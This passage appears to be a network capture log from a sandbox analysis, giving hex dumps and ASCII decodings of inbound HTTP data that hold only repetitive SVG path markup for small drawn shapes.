                                                                                                                                                                              2023-09-15 05:27:29 UTC2612INData Raw: 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2e 32 35 2c 33 34 34 2e 31 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 32 2c 33 33 36 2e 30 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32
                                                                                                                                                                              Data Ascii: ,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M402.25,344.16a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M402,336.08a2,2,0,0,1-.9,2.6,2
                                                                                                                                                                              2023-09-15 05:27:29 UTC2628INData Raw: 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 31 2e 36 37 2c 31 38 39 2e 38 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61
                                                                                                                                                                              Data Ascii: -3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M421.67,189.85a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><pa
                                                                                                                                                                              2023-09-15 05:27:29 UTC2644INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2e 32 33 2c 32 36 39 2e 35 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 35 37 2c 32 36 31 2e 34 34 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c
                                                                                                                                                                              Data Ascii: "></path><path class="cls-9" d="M457.23,269.51a2,2,0,0,1-.9,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M457,261.44a2,2,0,0,1-.91,2.6,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,
                                                                                                                                                                              2023-09-15 05:27:29 UTC2660INData Raw: 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 35 32 2c 33 34 31 2e 31 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 39 32 2e 32 35 2c 33 33 33 61 32 2c 32 2c 30 2c 30
                                                                                                                                                                              Data Ascii: ,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M492.52,341.1a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"></path><path class="cls-9" d="M492.25,333a2,2,0,0
                                                                                                                                                                              2023-09-15 05:27:29 UTC2676INData Raw: 32 2e 38 2c 30 2c 30 2c 31 2c 35 30 38 2c 31 39 33 61 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 32 2c 31 38 36 2e 37 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                              Data Ascii: 2.8,0,0,1,508,193a2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"></path><path class="cls-9" d="M512,186.79a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M
                                                                                                                                                                              2023-09-15 05:27:29 UTC2692INData Raw: 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 35 31 2c 32 36 36 2e 34 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 37 2e 32 34 2c 32 35 38 2e 33 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38
                                                                                                                                                                              Data Ascii: 33"></path><path class="cls-9" d="M547.51,266.46a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M547.24,258.38a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.8
                                                                                                                                                                              2023-09-15 05:27:29 UTC2708INData Raw: 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 32 2e 38 2c 33 33 38 2e 30 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                              Data Ascii: 0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class="cls-9" d="M582.8,338.05a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path
                                                                                                                                                                              2023-09-15 05:27:29 UTC2724INData Raw: 33 38 2c 33 37 2e 37 35 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 33 2e 31 33 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2e 31 36 2c 33 31 2e 32 37 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c
                                                                                                                                                                              Data Ascii: 38,37.75a1.61,1.61,0,0,1-.72,2.09,2.37,2.37,0,0,1-3.13-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M333.16,31.27a1.59,1.59,0,0,1-.72,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.47-2.69,2.1,2.1,0,
                                                                                                                                                                              2023-09-15 05:27:29 UTC2740INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 37 2c 39 35 2e 32 61 31 2e 35 39 2c 31 2e 35 39 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 31 2e 34 38 2c 38 38 2e 37 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c
                                                                                                                                                                              Data Ascii: .67"></path><path class="cls-9" d="M361.7,95.2a1.59,1.59,0,0,1-.73,2.08,2.35,2.35,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M361.48,88.71a1.6,1.6,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,
                                                                                                                                                                              2023-09-15 05:27:29 UTC2756INData Raw: 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 30 2c 31 35 32 2e 36 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 39 2e 38 2c 31 34 36 2e 31 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c
                                                                                                                                                                              Data Ascii: ,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M390,152.64a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M389.8,146.16a1.61,1.61,0,0,1-.73,
                                                                                                                                                                              2023-09-15 05:27:29 UTC2772INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 36 31 2c 32 38 2e 38 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 30 35 2e 33
                                                                                                                                                                              Data Ascii: .24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.61,28.81a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M405.3
                                                                                                                                                                              2023-09-15 05:27:29 UTC2788INData Raw: 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 34 33 30 2e 33 2c 39 34 61 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 33 33 2e 39 33 2c 38 36 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                              Data Ascii: 34,2.34,0,0,1,430.3,94a2.24,2.24,0,0,1,.48-2.7,2.09,2.09,0,0,1,2.7,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M433.93,86.26a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.1,2.1,0,0,1,2.7,0,2,2,0,0,1,.15,2.68"></path><
                                                                                                                                                                              2023-09-15 05:27:29 UTC2804INData Raw: 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 36 32 2e 32 35 2c 31 34 33 2e 37 31 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c
                                                                                                                                                                              Data Ascii: ,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"></path><path class="cls-9" d="M462.25,143.71a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,
                                                                                                                                                                              2023-09-15 05:27:29 UTC2820INData Raw: 73 2d 39 22 20 64 3d 22 4d 34 37 38 2e 30 35 2c 32 36 2e 33 36 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 32 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 37 37 2e 38 34 2c 31 39 2e 38 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e
                                                                                                                                                                              Data Ascii: s-9" d="M478.05,26.36a1.6,1.6,0,0,1-.72,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M477.84,19.88a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.
                                                                                                                                                                              2023-09-15 05:27:29 UTC2836INData Raw: 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 33 37 2c 38 33 2e 38 31 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 30 36 2e 31 35 2c 37 37 2e 33 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38
                                                                                                                                                                              Data Ascii: .67"></path><path class="cls-9" d="M506.37,83.81a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"></path><path class="cls-9" d="M506.15,77.33a1.6,1.6,0,0,1-.73,2.09,2.36,2.36,0,0,1-3.12-.88
                                                                                                                                                                              2023-09-15 05:27:29 UTC2852INData Raw: 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 36 39 2c 31 34 31 2e 32 36 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 33 34 2e 34 37 2c 31 33 34 2e 37 38 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30
                                                                                                                                                                              Data Ascii: 71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.69,141.26a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M534.47,134.78a1.62,1.62,0,0,1-.73,2.0
                                                                                                                                                                              2023-09-15 05:27:29 UTC2868INData Raw: 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 32 38 2c 31 37 2e 34 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 35 30 2e 30 36 2c 31 31 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 31
                                                                                                                                                                              Data Ascii: 2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.28,17.43a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"></path><path class="cls-9" d="M550.06,11a1.62,1.62,0,0,1
